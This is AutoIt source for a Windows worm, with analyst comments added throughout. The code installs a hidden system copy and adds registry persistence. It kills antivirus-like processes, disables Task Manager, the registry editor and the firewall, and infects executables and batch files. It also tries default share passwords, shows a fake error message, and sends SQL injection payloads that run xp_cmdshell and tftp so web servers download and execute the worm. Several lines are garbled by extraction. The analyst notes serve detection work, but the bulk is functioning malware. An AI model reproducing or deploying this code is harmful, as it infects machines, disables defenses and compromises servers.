AI.AI-Worm by Mr.Anderson || Project Folder
>AI.AI-Worm by Mr`Anderson || Project Folder
;AI-Worm(C) by Mr`Anderson/doomriderz
;There's no patch for stupidity
;I think that to exploit men's mind is better than to exploit programs ;>
; ---- Script body (top-level statements; the Func definitions follow below) ----
; Two run modes are distinguished by the command line: with exactly one argument,
; "silent", this process is the installed resident copy and enters the endless
; spreading loop; with any other command line it is the installer (a fresh copy or
; a copy embedded in an infected host) and drops the resident copy first.
; Note for readers: several lines of this listing lost their comparison operators
; during extraction (e.g. `if @IPAddress1"127.0.0.1" then`) and some lines lost
; text entirely; the code is kept exactly as found and will not parse as shown.
; Analyst notes, all taken from the statements below:
;  * persistence: HKCU\...\Winlogon "Shell" = "Explorer.exe <copy> silent", with a
;    fallback to HKLM\...\Run, or System.ini [boot] shell on non-NT systems;
;  * dropped copy: @SystemDir\<six random lowercase letters>.exe, attributes +HSR,
;    launched with the argument "silent";
;  * the installer ends with a fake "is not a valid Win32 application" message.
if not @Compiled then Exit
; Tray/error options that keep the process invisible and non-interactive.
Opt("TrayAutoPause",0);can't pause the ****** by clicking on the tray icon
Break(0);same
Opt("TrayIconDebug",0)
Opt("TrayIconHide",1);hide tray icon
Opt("RunErrorsFatal",0);don't display fatal errors when running external programs
FixReg();fix the registry
; Globals shared with the crawler/injection functions further down:
; $globalServerList   - newline-separated "http://host/" strings harvested from files
; $globalCheckedSrvLst - servers already handed to Hax()
Dim $globalServerList = ""
Dim $globalCheckedSrvLst = ""
Dim $sSessionLinks, $sOldLinks, $sSQLInjectionQuery, $sXpLinks, $tftp_name, $sVectors
Dim $copy_name = @******Name;current copy name
Dim $copy_path = @AutoItExe;current copy path (complete path+name)
Dim $reg_key = "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon";startup key
Dim $reg_val = "Explorer.exe " & $copy_name & " silent";startup key val
; Substrings used both to veto random copy names and, in EndBadProcs(), to kill
; processes whose image name contains them. The filters are very broad ("av",
; "reg", "proc", "upd"), so unrelated processes are also terminated.
Dim $bad_procs[13];list of words to filter processes
$bad_procs[0] = "anti"
$bad_procs[1] = "vir"
$bad_procs[2] = "fix"
$bad_procs[3] = "remov"
$bad_procs[4] = "upd"
$bad_procs[5] = "ack"
$bad_procs[6] = "protect"
$bad_procs[7] = "secur"
$bad_procs[8] = "proc"
$bad_procs[9] = "av"
$bad_procs[10] = "mgr"
$bad_procs[11] = "reg"
$bad_procs[12] = "troj"
; Decide the persistence method and read back whatever is currently installed
; into $check_name (lower-cased) so the installer can detect a prior install.
If ( @OSTYPE = "WIN32_NT" ) Then;if running under win nt
$check_name = StringLower(RegRead($reg_key,"Shell"));read the startup key
If ( StringLen($check_name) = 0 ) Then;if the key is empty or doesn't exist
$reg_key = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run";change startup method
$reg_val = $copy_path & " silent";fit the key val to the new startup method
$check_name = StringLower(RegRead($reg_key,"Shell"));get the val if already there
EndIf
Else;if not running under win nt
$reg_key = "";use system.ini startup method
$check_name = StringLower(IniRead(@WindowsDir & "\System.ini","boot","shell",""));check the ini
EndIf
; ---- Resident mode: never returns (the While True loop below has no exit) ----
If $CmdLine[0]=1 And $CmdLine[1] = "silent" Then;if running with 1 parameter and the parameter is "silent" the we are installed and ready to spread
TCPStartup()
SetStartup();set startup method in order to run every time win starts
If ( @OSTYPE = "WIN32_WINDOWS" ) then;if running under win98/me
DllCall("kernel32.dll","dword","RegisterServiceProcess","dword",@AutoItPID,"dword",1);call kernel's RegServProc in order to hide our process
EndIf
IterateThroughDrives("ALL");go through all drives
; Each iteration rewrites persistence and policy keys and kills filtered
; processes, so a single cleanup of those keys is undone immediately while
; this process is alive; remove the process first, then the artifacts.
While True;our loop
SetStartup();keep writing the registry or the ini file
FixReg();keep fixing the registry
EndBadProcs();keep ending bad precesses
; (extraction artifact: the condition and "Then" are missing on the next line)
If ( @SEC = 0 And Random(0,1) IterateThroughDrives("REMOVABLE");check rem drives to infect
EndIf
If ( @MIN = 0 ) Then;every hour,
IterateThroughDrives("NETWORK");check net drives to infect
EndIf
; (extraction artifact: the condition and "Then" are missing on the next line)
If ( @MIN = 0 And Random(0,1) IterateThroughDrives("FIXED");check fixed drives to infect
EndIf
; Pick the first harvested server whose IP differs from this host and hand it
; to Hax(); the server is then moved from the pending to the checked list.
if @IPAddress1"127.0.0.1" then; if a connection is available
Dim $gsl = stringsplit($globalServerList,@lf);split the global server list
if $gsl[0=]=>0 Then;if it is not empty
Dim $nextserver = ""
for $s=1 to $gsl[0];go through it
if $gsl[$s]"" Then;and find the first server
Dim $urlpart = stringsplit($gsl[$s],"/")
if TCPNameToIP($urlpart[3])@IPAddress1 Then;if it doesn't match our same ip
$nextserver = $gsl[$s];select it
ExitLoop;exit the loop
EndIf
EndIf
Next
if $nextserver"" Then;if a valid server was found
Hax($nextserver,"");try to hax it with sql injection!
$globalServerList = stringreplace($globalServerList,@lf&$nextserver,"");delete this server from the list
$globalCheckedSrvLst &= @lf&$nextserver;add the server to a list of checked ones
EndIf
EndIf
Endif
WEnd
EndIf
; ---- Installer mode ----
; RunHost() returns the worm's own bytes (everything before the "[h0st]" marker)
; when this executable is an infected host, or "" when it is a plain copy.
Dim $vir_body = RunHost();run the host if the worm is being run from an infected file
Dim $show_err_msg = True;show fake error msg on exit
If StringLen($vir_body) = 0 Then;if not running from and infected file
$vir_body = FileRead(@AutoItExe);read ourselves
Else;if ran from inf file,
$show_err_msg = False;do not show the fake err
EndIf
; Already-installed check: recover the installed copy's name from the startup
; value read earlier and exit if that file exists.
if ( StringLen($check_name) > 0 And $check_name "explorer.exe" ) Then;check if we are already installed or not
Dim $offs = 14;len of explorer.exe and a white space, + 1
if stringleft($check_name,12)"explorer.exe" Then $offs = 0;if we are using the 2nd method to track the sys, zero the offset
$check_name = StringMid($check_name,$offs,10);get the name of the installed worm if present
If ( FileExists($check_name) ) Then Quit($show_err_msg);if it exists, quit
EndIf
ProcessSetPriority(@AutoItPID,4);start going resident by setting our proc's priority to high, so we can do it faster
; Generate a six-letter random name that contains none of the $bad_procs
; substrings (so the copy does not kill itself in EndBadProcs()).
$copy_name = "";reset copy name
While ( $copy_name = "" );while a valid copy name hasn't been rendomized, do
$copy_name = Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & Chr(Int(Random(97,122))) & ".exe";six random chars and .exe extension
For $p=0 To UBound($bad_procs)-1;go through bad procs names
if ( StringInStr(StringLower($copy_name),StringLower($bad_procs[$p]))>0 ) Then;if the random name matches a filter,
$copy_name = "";reset the copy name
ExitLoop;exit loop (randomize another name)
EndIf
Next
WEnd
; Stage through @TempDir\~<name>, replace any existing copy in @SystemDir
; (terminating it if running), mark it hidden/system/read-only, and launch it.
$tmp_path = @TempDir & "\~" & $copy_name;build a temp path
FileWrite($tmp_path,$vir_body);write there our body
$copy_path = @SystemDir&"\"&$copy_name;build the copy path
If FileExists($copy_path) Then;check if the file already exists
If ProcessExists($copy_name) Then;if it is being run,
ProcessClose($copy_name);close the process
Sleep(2000);sleep 2 secs till the process shuts down
EndIf
FileSetAttrib($copy_path,"-HSR");reset the attribs
FileDelete($copy_path);delete it!
EndIf
FileCopy($tmp_path,$copy_path);copy our temp copy to that location
FileSetAttrib($copy_path,"+HSR");set hidden,system,read only attribs
FileDelete($tmp_path);delete temp copy
Run($copy_path & " silent",@SystemDir);run the copy with the "silent" parameter
Quit($show_err_msg);quit
Func IterateThroughDrives($drive_type);go thru all the drives of the spec type
; Walks every drive of the given DriveGetDrive() type ("ALL", "REMOVABLE",
; "NETWORK", "FIXED") and calls IterateThrough() on each readable root.
; $drive_type - drive class string; "" is treated as "ALL". Returns nothing.
; Note: $dryve_type below is assigned but never read; DriveGetDrive() receives
; the original, un-uppercased $drive_type.
; Analyst note: for NETWORK drives the share is re-mapped with a fixed list of
; credentials (Administrator/"", Guest/"", admin/admin) when the first mapping
; fails with @error 2 or 6. Repeated failed logons with these account names
; from one workstation are a usable indicator, and disabling blank-password
; and default-account access on shares blocks this path.
if ( StringLen($drive_type) = 0 ) Then $drive_type = "ALL";if none is specified, set it to "all"
$dryve_type = StringUpper($drive_type);make it upper case
$drives = DriveGetDrive( $drive_type );list all drives of that type
If NOT @error Then;if no errors,
For $i = 1 to $drives[0];go thru
If ( StringUpper(DriveGetType($drives[$i])) = "NETWORK" ) Then;if drv type is netdrive
$md = DriveMapAdd("*", $drives[$i]);try to map it to the first free drive letter (returned as $md)
If ( @error = 2 Or @error = 6 ) Then;if wrong user or pwd
$md = DriveMapAdd("*", $drives[$i], 0, "Administrator", "");try accessing it as admin with no pwd
If ( @error = 2 Or @error = 6 ) Then;if fails
$md = DriveMapAdd("*", $drives[$i], 0, "Guest", "");try as guest with no pwd
If ( @error = 2 Or @error = 6 ) Then;if fails
$md = DriveMapAdd("*", $drives[$i], 0, "admin", "admin");try as admin with pwd: admin
EndIf
EndIf
EndIf
; @error here reflects the last DriveMapAdd() attempt only.
If ( @error = 0 ) Then ;if drive was mapped
IterateThrough($md);go thru it to infect
DriveMapDel($md);unmap it
EndIf
ElseIf ( StringUpper(DriveStatus($drives[$i])) = "READY" ) Then;if the drive is not a netdrive (so fixed or remov) and it is ready to be read
IterateThrough($drives[$i]);go thru to infect
EndIf
Next
EndIf
EndFunc
Func IterateThrough($dir);goes thru the spec folder and subdirs
; Recursive directory walk. For each non-directory entry, by the last three
; characters of the name:
;   bat/pif/cmd        -> InfectFile() unconditionally;
;   exe/scr            -> InfectFile() subject to a probability ($nProb) that is
;                         reduced by a quarter after each success in this folder
;                         (the condition on that line is partly lost in extraction);
;   htm/tml/php/asp/jsp/eml/nws/txt
;                      -> scanned for "http://" substrings; each server prefix
;                         found is appended to $globalServerList for Hax() to try.
; Subdirectories are recursed into, except "." / ".." and, on NT, "dllcache"
; (that condition's operators are lost in extraction). Returns nothing.
; $dir - directory path without trailing backslash (entries are built as $dir & "\" & $file).
; Analyst note: $nProb is declared inside the function, so the probability
; resets to 1.0 for every directory; the walk touches every readable file on
; every drive class passed in by IterateThroughDrives(), which is heavy file I/O
; visible to file-access auditing.
If ( Not FileExists($dir) ) Then Return;if it doesn't exist quit
$search = FileFindFirstFile($dir & "\*.*");find first file
If $search = -1 Then Return;if fails ret
Dim $nProb = 1.0;infeciton probability (of exe and scr files only)
While True;we'll exit the loop when we need to
$file = FileFindNextFile($search);find next file
If @error Then ExitLoop;if no more files are found, quit
If ( StringInStr(FileGetAttrib($dir & "\" & $file),"D") = 0 ) Then;if the spec file is not a folder
Dim $ftype = stringlower(stringright($file,3));get file type (first 3 chars from the right)
If ( $ftype="bat" Or $ftype="pif" Or $ftype="cmd" ) Then;w/e it is a batch or pif file,
InfectFile($dir & "\" & $file);infect it
Elseif ( $ftype = "exe" Or $ftype = "scr" ) Then;w/e it is an exe or scr
; (extraction artifact: the end of the condition and "Then" are missing below)
If ( (StringInStr($file,"setup",false)>0 Or StringInStr($file,"inst",false)>0 Or StringInStr($file,"patch",false)>0 Or StringInStr($file,"fix",false)>0) and Random(0,1) If ( InfectFile($dir&"\"&$file) ) Then; infect it and if infected,
$nProb*=0.75;reduce the infection prob of the exe files in this folder by 1/4
EndIf
EndIf
ElseIf ( $ftype="htm" or $ftype="tml" or $ftype="php" or $ftype="asp" or $ftype="jsp" or $ftype="eml" or $ftype="nws" or $ftype="txt" ) then;if the file may contain any web server address in the format http://servernameorip[/],
Dim $h = FileOpen($dir&"\"&$file,0);open the file in read mode
; (extraction artifact: operator missing in the handle check below)
if $h-1 Then;if success
Dim $fbody = stringreplace(FileRead($h),"\","/");read it and rep all "\" with "/"
if @error=0 Then;if success
; Scan character by character for "http://" and copy up to the next "/" or
; space; the outer index $z is advanced past the match.
For $z=1 to stringlen($fbody)-6;go throu all chars
Dim $flag = stringlower(stringmid($fbody,$z,7))
if $flag = "http://" Then;whenever we find "http://"
Dim $newserv = $flag;find the serv addr
For $k=$z to stringlen($fbody)
Dim $newc = stringmid($fbody,$k,1)
$newserv&=$newc
if $newc="/" or $newc=" " Then
$z=$k
ExitLoop
Endif
Next
$newserv = stringlower($newserv);make it lower case
if (stringinstr($globalServerList,$newserv)=0 and stringinstr($globalCheckedSrvLst,$newserv)=0) Then;if it hasn't already been found
$globalServerList&=@lf&$newserv;write it to the list of servers to hack later...
EndIf
EndIf
Next
EndIf
EndIf
EndIf
; (extraction artifact: comparison operators missing in the condition below)
ElseIf ( ($file".." and $file".") and (@OSTYPE "WIN32_NT" Or StringLower($file) "dllcache") ) Then;if the file is a directory and it is different from ".." and "." and we are not under winnt or the directory isn't "dllcache",
IterateThrough($dir & "\" & $file);go thru it
EndIf
WEnd
FileClose($search);close search handle
EndFunc
Func RunHost();runs the host program with cmdline and in the context of current working dir by extracting it to the temp folder. then returns the body of the worm (empty if host file was not found)
; Splits the running executable at the first "[h0st]" marker.
; Returns "" when no marker is present (StringInStr() gives 0, so $n is -1).
; Otherwise the bytes after the marker (the original host program) are written
; to @TempDir\<current exe name>, executed with the original raw command line
; from @WorkingDir, and the bytes before the marker (the worm) are returned.
; Analyst note: an executable launched from @TempDir under the same name as the
; infected program, with the parent being that program, is the runtime
; signature of an infected host; the "[h0st]" string itself is a static one.
$body = FileRead(@AutoItExe)
$n = StringInStr($body,"[h0st]")-1
If $n = -1 Then Return ""
; "[h0st]" is 6 characters; +7 skips past it (1-based StringMid).
$host_body = StringMid($body,$n+7)
$my_body = StringLeft($body,$n)
$host_name = @TempDir & "\" & @******Name
if FileExists($host_name) then FileDelete($host_name)
FileWrite($host_name,$host_body)
Run($host_name & " " & $CmdLineRaw,@WorkingDir)
Return $my_body
EndFunc
Func InfectFile($host);infects a file, by prepending itself to it (very noob, but this way we can also infect batch files and pif files)
; Prepender: rewrites $host as <this executable's bytes> & "[h0st]" & <original bytes>.
; $host - full path of the target file.
; Returns False if the file does not exist or already contains "[h0st]"
; (case-sensitive check), or if it cannot be opened for writing; True otherwise.
; Analyst note: the original modified/accessed timestamps and attributes are
; saved first and restored afterwards (FileSetTime/FileSetAttrib below), so
; file timestamps do not reveal the change; rely on content scanning for the
; "[h0st]" marker and on the changed file size instead.
If ( Not FileExists($host) ) Then Return False
$ret = True
$time_modified = FileGetTime($host,0,1)
$time_accessed = FileGetTime($host,2,1)
$host_attributes = FileGetAttrib($host)
FileSetAttrib($host,"-HSR")
$host_body = FileRead($host)
$my_body = FileRead(@AutoItExe)
$ret = (StringInStr($host_body,"[h0st]",true) = 0)
If ( $ret ) Then
$handle = FileOpen($host,2)
; (extraction artifact: comparison operator missing below)
$ret = ( $handle -1 )
If ( $ret ) Then
$host_body = "[h0st]"&$host_body
FileWrite($handle,$my_body & $host_body)
FileClose($handle)
EndIf
EndIf
FileSetTime($host,$time_modified,0)
FileSetTime($host,$time_accessed,2)
FileSetAttrib($host,$host_attributes)
Return $ret
EndFunc
Func EndBadProcs();if any process name matches one of the filters, ends it
; Enumerates all processes and calls ProcessClose() on every PID whose image
; name contains any $bad_procs substring (case-insensitive, third argument
; false). Called from the resident loop, so the kills repeat continuously.
; Analyst note: the match is a plain substring test, so filters such as "av",
; "reg", "proc" and "upd" also hit unrelated processes; a burst of process
; terminations from a single PID is a usable behavioural indicator, and
; tamper-protected security tooling is the mitigation.
$procs = ProcessList()
For $i=0 To UBound($procs)-1
For $j=0 To UBound($bad_procs)-1
If(StringInStr($procs[$i][0],$bad_procs[$j],false)) Then
ProcessClose($procs[$i][1])
EndIf
Next
Next
EndFunc
Func SetStartup();sets the startup
; Writes the persistence value chosen by the script body: RegWrite of the
; "Shell" value under $reg_key when that key is set (NT), otherwise the
; System.ini [boot] shell entry (Win9x/ME). $reg_val is "Explorer.exe <name> silent"
; or "<path> silent" depending on the method selected earlier.
; Analyst note: monitoring writes to Winlogon\Shell and to the Run key, and
; diffing System.ini [boot] shell against "explorer.exe", covers all three paths.
If( StringLen($reg_key) > 0 ) Then;using the registry (under winnt)
RegWrite($reg_key,"Shell","REG_SZ",$reg_val)
Else;using the system.ini method (under win98/me)
IniWrite(@WindowsDir & "\System.ini","boot","shell",$reg_val)
EndIf
EndFunc
Func FixReg();fixes the regstry
; Applies five policy/registry values that hide the dropped copy and reduce the
; user's ability to inspect the system; rewritten on every loop iteration.
; Analyst note: these exact values are a compact detection and cleanup list:
; ShowSuperHidden=0, DisableRegistryTools=1, DisableTaskMgr=1, NoFolderOptions=1
; under HKCU, and SharedAccess Start=4 (service disabled) under HKLM. The HKLM
; write needs local admin rights; the HKCU writes do not.
Regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0);to not show hidden system files
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD",1);to disable the registry editor
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD",1);to disable the task mgr
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoFolderOptions","REG_DWORD",1);to not show "folder options.." under xplorer.exe's menus
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess","Start","REG_DWORD",4);to disable the windows firewall at startup
EndFunc
Func Quit($bShow)
; Terminates the script. When $bShow is true a 20-second MsgBox (icon 16, stop)
; claiming the executable "is not a valid Win32 application" is shown first,
; imitating the loader error a user would expect from a corrupt program.
If $bShow Then MsgBox(16,"Error",@AutoItExe&" is not a valid Win32 application.",20);fake msg
Exit
EndFunc
Func Hax($sBServer,$sSPage);tries to hax a given web server by finding any injectable url or form and trying to inject commands to make the server download and execute remotely our worm
$tftp_name = Int(Random(1000,2000))
$sSQLInjectionQuery = "waitfor delay '0:0:3'; exec master..xp_cmdshell 'tftp.exe -i "&@IPAddress1&" GET worm "&$tftp_name&".exe'; waitfor delay '0:0:5'; exec master..xp_cmdshell '"&$tftp_name&".exe';"
if (Stringlen($sBServer)=0)then Return
if(Stringinstr($sBServer,"://")=0)then $sBServer="http://"&$sBServer
if(Stringright($sBServer,1)"/" and stringright($sBServer,1)"\") then $sBServer = $sBServer&"/"
$sBServer = FormatURL($sBServer)
$sSPage = FormatURL($sSPage)
if ( StringInStr($sSPage,"://")=0 ) then $sSPage = $sBServer & $sSPage
StartSearch($sBServer,$sSPage)
EndFunc
Func StartSearch($sRootServer,$sStartAddress);searches the given address for juicy urls and forms to hack
; Recursive crawler. Fetches $sStartAddress with HTTPRequest(), passes the body
; to Analyze() (which returns True as soon as an injection attempt succeeds, in
; which case this function returns), then picks one link from the session or
; old link lists and recurses into it. Lines 304-308 of the listing are
; heavily truncated in extraction, so the selection rule cannot be read here.
; $sRootServer   - "http://host/" root used to resolve relative links.
; $sStartAddress - page to fetch; made absolute against the root if needed.
; Globals used: $sSessionLinks, $sOldLinks, $sXpLinks (newline-separated lists).
; Analyst note: the recursion has no visible depth limit other than the link
; lists running empty; from the server side this appears as a sequential crawl
; from one client IP with HTTP/1.0 requests and no User-Agent (see HTTPRequest()).
if (Stringlen($sRootServer)=0)then Return
if(Stringinstr($sRootServer,"://")=0)then $sRootServer="http://"&$sRootServer
; (extraction artifact: comparison operators missing below)
if(Stringright($sRootServer,1)"/" and stringright($sRootServer,1)"\") then $sRootServer = $sRootServer&"/"
$sRootServer = FormatURL($sRootServer)
$sStartAddress = FormatURL($sStartAddress)
if ( StringInStr($sStartAddress,"://")=0 ) then $sStartAddress = $sRootServer & $sStartAddress
$StartPageCode = HTTPRequest($sStartAddress)
if ( stringlen($StartPageCode) > 0 ) then
If Analyze($StartPageCode,stringleft($sStartAddress,LastIndexOf($sStartAddress,"/",false)+1),GetResourceName($sStartAddress)) Then
Return
EndIf
EndIf
; Choose the link vector: session links found on this page if any, otherwise
; the accumulated old links; session links are then merged into $sOldLinks.
if stringlen($sSessionLinks)=0 Then
if stringlen($sOldLinks)=0 Then
return
EndIf
$SQLVec = stringsplit($sOldLinks,@lf)
Else
$SQLVec = stringsplit($sSessionLinks,@lf)
$sOldLinks = $sOldLinks&@lf&$sSessionLinks
$sSessionLinks = ""
EndIf
$l=1
$i=int(random(0,1)*($SQLVec[0]-1))+1
; (extraction artifact: the loop condition and body on the next lines are truncated)
While ( $l0) Or (StringInStr($SQLVec[$i],"forum")>0 and Random(0,1) $i=int(random(0,1)*($SQLVec[0]-1))+1
$l+=1
WEnd
If $l Dim $xl = stringsplit($sXpLinks,@lf)
if $xl[0] $sXpLinks &= $SQLVec[$i] & @lf
StartSearch($sRootServer, $SQLVec[$i])
EndIf
EndIf
EndFunc
Func Analyze($sCode,$sRoot,$sResName);analyzes the code searching urls and forms
; Scans one HTML document line by line after FormatText() normalisation.
;  * Form handling: on a form-opening tag the action/method are read with
;    GetOption(); each input/select-type tag contributes "name=value" to
;    $new_url; on the closing tag the assembled URL is recorded in $sVectors
;    and passed to SQLInjection(). (The tag literals, which begin with "<",
;    were lost in extraction, so the exact tags tested cannot be read here.)
;  * Link handling: every href/src (except "java...:" pseudo-URLs) that carries
;    "?" and "=" is tried with SQLInjection() as a GET vector; links with a
;    page-like extension on the same host (by name or resolved IP) are queued
;    in $sSessionLinks for StartSearch() to crawl.
; $sCode    - page body; $sRoot - "http://host/dir/" used to absolutise links;
; $sResName - resource name of the page (passed in, not used below).
; Returns True the moment SQLInjection() reports success, otherwise False.
; Strip($x,"=","&") is used so that vectors are compared by parameter names
; only, ignoring values.
$sCode = FormatText($sCode)
$CodeLines = StringSplit($sCode, @lf)
Dim $new_url = ""
Dim $bWritingUrl = false
For $ln = 1 to $CodeLines[0]
if ( stringlen($codelines[$ln])>0 ) then
; (extraction artifact: the tag literal in the condition below is missing)
if ( StringInStr(stringlower($CodeLines[$ln]),"0 and not $bWritingUrl ) then
$bWritingUrl = true
$new_url = GetOption("action",$CodeLines[$ln])
$new_url_method = StringUpper(GetOption("method",$CodeLines[$ln]))
if ( Stringlen($new_url_method)=0 ) Then $new_url_method = "GET"
if ( StringInStr($new_url,"?")=0 ) then $new_url = $new_url & "?"
endif
; (extraction artifact: the tag literals in the condition below are missing)
if ( (StringInStr(StringLower($CodeLines[$ln]),"0 or StringInStr(StringLower($CodeLines[$ln]),"0) and $bWritingUrl ) then
$varname = GetOption("name",$CodeLines[$ln])
if ( stringlen($varname)>0 ) then
; (extraction artifact: comparison operator missing below)
if ( stringright($new_url,1) "?" ) then $new_url = $new_url & "&"
$new_url = $new_url & $varname & "="
$param_value = GetOption("value",$CodeLines[$ln])
; When the field has no inline value, look ahead on following lines for one.
if ( stringlen($param_value)=0 And StringInStr(StringLower($CodeLines[$ln]),"0 ) Then
$o=$ln
Do
$o=$o+1
If ( StringInStr(StringLower($CodeLines[$o]),"0 ) Then
$param_value = GetOption("value",$CodeLines[$o])
EndIf
Until ( stringlen($param_value)>0 Or $o>=($CodeLines[0]-$ln) )
EndIf
$new_url = $new_url & $param_value
endif
endif
; End of form: record the vector (URL#METHOD) and attempt injection once.
if ( StringInStr(StringLower($CodeLines[$ln]),"0 and $bWritingUrl ) then
$new_url = FormatURL($new_url)
if ( StringInstr(Strip($sVectors,"=","&"),Strip($new_url,"=","&"))=0 ) Then
if ( stringleft($new_url,7)"http://" ) Then
$new_url = $sRoot & $new_url
EndIf
$sVectors &= @lf&$new_url&"#"&$new_url_method
if SQLInjection($new_url,$sSQLInjectionQuery,$new_url_method) Then
Return True
endif
EndIf
if ( StringInstr($sOldLinks,$new_url)=0 And StringInstr($sSessionLinks,$new_url)=0 ) Then
if ( stringleft($new_url,7)"http://" ) Then
$new_url = $sRoot & $new_url
EndIf
$sSessionLinks &= $new_url&"#"&$new_url_method&@lf
EndIf
$new_url = ""
$new_url_method = ""
$bWritingUrl = false
endif
; Plain links: href first, then src.
$Address = GetOption("href",$CodeLines[$ln])
if( stringlen($Address) = 0 )Then
$Address = GetOption("src",$CodeLines[$ln])
EndIf
if( stringlen($Address) > 0 and StringInStr($Address,"java******:")=0 )Then
$Address = FormatURL($Address)
if ( StringInStr($Address,"?")>0 And StringInStr($Address,"=")>0 And StringInstr(Strip($sVectors,"=","&"),Strip($Address,"=","&"))=0 ) Then
if ( stringleft($Address,7)"http://") Then
$Address = $sRoot & $Address
EndIf
$sVectors &= @lf&$Address&"#GET"
if SQLInjection($Address,$sSQLInjectionQuery,"GET") Then
Return True
EndIf
endif
Dim $ext = stringlower(GetResourceExtension($Address))
if ($ext="" Or $ext="htm" or $ext="html" or $ext="php" or $ext="asp" or $ext="jsp" or $ext="aspx" or $ext="jspx" or $ext="pl" or $ext="cgi") then
if ( StringInstr($sOldLinks,$Address)=0 And StringInstr($sSessionLinks,$Address)=0 ) Then
if ( stringleft($Address,7)"http://" ) Then
$Address = $sRoot & $Address
EndIf
; Same-host check: compare the host component ($x[3] of a "/" split of
; "http://host/...") by name or by resolved IP in either direction.
Dim $addrserv = stringlower(Stringleft($Address,Stringlen($sRoot)))
Dim $newserv = stringsplit($addrserv,"/")
Dim $myserv = stringsplit($sRoot,"/")
If ( stringlower($newserv[3])=stringlower($myserv[3]) or $newserv[3]=TCPNameToIP($myserv[3]) or TCPNameToIP($newserv[3])=$myserv[3] ) Then
$sSessionLinks &= $Address&@lf
EndIf
endif
endif
EndIf
EndIf
Next
Return False
EndFunc
Func SQLInjection ( $sVect , $sQuery , $sMethod ); tries sql injection over the given url with the given query
; For every "name=value" pair in the query string of $sVect, sends the request
; twice with the percent-encoded $sQuery appended to that value (once preceded
; by "';", once by ";"), as a raw HTTP/1.0 GET or form-encoded POST, and after
; each send waits up to 6000 ms in TFTPSession() for the target to fetch the
; worm back. Returns True on the first successful TFTP transfer, False otherwise
; (no vector, no query string, connection failure, or all pairs exhausted).
; $sVect   - absolute URL with a "?" query; $sQuery - SQL text; $sMethod - "GET"
;            or anything else (treated as POST-style body), "" defaults to "GET".
; Empty values ("name=&") are filled with "12345" ("12345@a.aa" for names
; containing "mail") before the payload is attached.
; Analyst note: the payload is always suffixed with "--sp_password"; SQL Server
; omits statements containing "sp_password" from its trace output, so database
; trace logs alone may miss these requests - inspect web-server/WAF logs, where
; the percent-encoded "waitfor delay"/"xp_cmdshell" text is visible.
Dim $s = - 1
Dim $sServer = ""
Dim $nPort = 80
if ( Stringlen ( $sVect )= 0 Or Stringlen ( $sQuery )= 0 Or StringInStr ( $sVect , "?" )= 0 ) Then Return False
If ( Stringlen ( $sMethod )= 0 ) Then $sMethod = "GET"
; Split "http://host[:port]/path?query" on "/"; element 3 is host[:port].
$url_parts = StringSplit ( $sVect , "/" )
$sServer = $url_parts [ 3 ]
if ( StringInStr ( $sServer , ":" )> 0 ) Then
$nPort = Int ( StringMid ( $sServer , StringInStr ( $sServer , ":" )+ 1 ))
$sServer = Stringleft ( $sServer , IndexOf ( $sServer , ":" , false ))
EndIf
$url_parts [ 1 ]= ""
$url_parts [ 3 ]= ""
$sVect = join ( $url_parts , "/" )
$sVect = FormatURL ( $sVect )
$sParams = Stringright ( $sVect , Stringlen ( $sVect )- StringInStr ( $sVect , "?" ))
if ( Stringlen ( $sParams )= 0 Or $sParams = $sVect ) Then Return False
$sVect = Stringleft ( $sVect , StringInStr ( $sVect , "?" ))
$sParams = $sParams & "&"
If StringInStr ( $sParams , "=&" )> 0 Then
Dim $sTmpParams = ""
$TmpParam = Stringsplit ( $sParams , "=&" )
For $t = 1 To $TmpParam [ 0 ]- 1
if stringlen ( $TmpParam [ $t ])> 0 Then
$sTmpParams = $sTmpParams & $TmpParam [ $t ] & "=12345"
if StringInStr ( StringLower ( $TmpParam [ $t ]), "mail" )> 0 Then
$sTmpParams = $sTmpParams & "@a.aa"
EndIf
$sTmpParams = $sTmpParams & "&"
EndIf
Next
$sTmpParams = Stringleft ( $sTmpParams , Stringlen ( $sTmpParams )- 1 )
$sParams = $sTmpParams
Else
$sParams = Stringleft ( $sParams , Stringlen ( $sParams )- 1 )
EndIf
$sVect = $sVect & $sParams
; Flatten "a=1&b=2" into a newline-separated list: odd indexes are names,
; even indexes are values.
$sParams = StringReplace ( $sParams , "=" ,@ lf )
$sParams = StringReplace ( $sParams , "&" ,@ lf )
Dim $Param = Stringsplit ( $sParams ,@ lf )
$s = TCPConnect ( TCPNameToIP ( $sServer ), $nPort )
If @ error or $s = - 1 Then Return False
Dim $sp = $sServer
; (extraction artifact: comparison operator missing below)
if $nPort 80 then $sp = $sp & ":" & $nPort
For $p = 2 To $Param [ 0 ] Step 2
If ( Stringlen ( $Param [ $p ])> 0 ) Then
$sTempVect = StringReplace ( $sVect , $Param [ $p - 1 ] & "=" & $Param [ $p ], $Param [ $p - 1 ] & "=" & $Param [ $p ] & FormatQuery ( "';" & $sQuery & "--sp_password" ))
if ( $sMethod = "GET" ) Then
Dim $query = $sMethod & " /" & $sTempVect & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & @ crlf
Else
Dim $newparams = Stringmid ( $sTempVect , Stringinstr ( $sTempVect , "?" )+ 1 )
Dim $query = $sMethod & " /" & stringleft ( $sTempVect , stringinstr ( $sTempVect , "?" )- 1 ) & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & "Content-Type: application/x-www-form-urlencoded" & @ crlf & "Content-length: " & stringlen ( $newparams ) & @ crlf & @ crlf & $newparams & @ crlf & @ crlf
EndIf
TCPSend ( $s , $query )
if TFTPSession ( 6000 ) then
Return True
EndIf
; Second variant on a fresh connection; the previous socket is not closed here.
$s = TCPConnect ( TCPNameToIP ( $sServer ), $nPort )
If @ error or $s = - 1 Then Return False
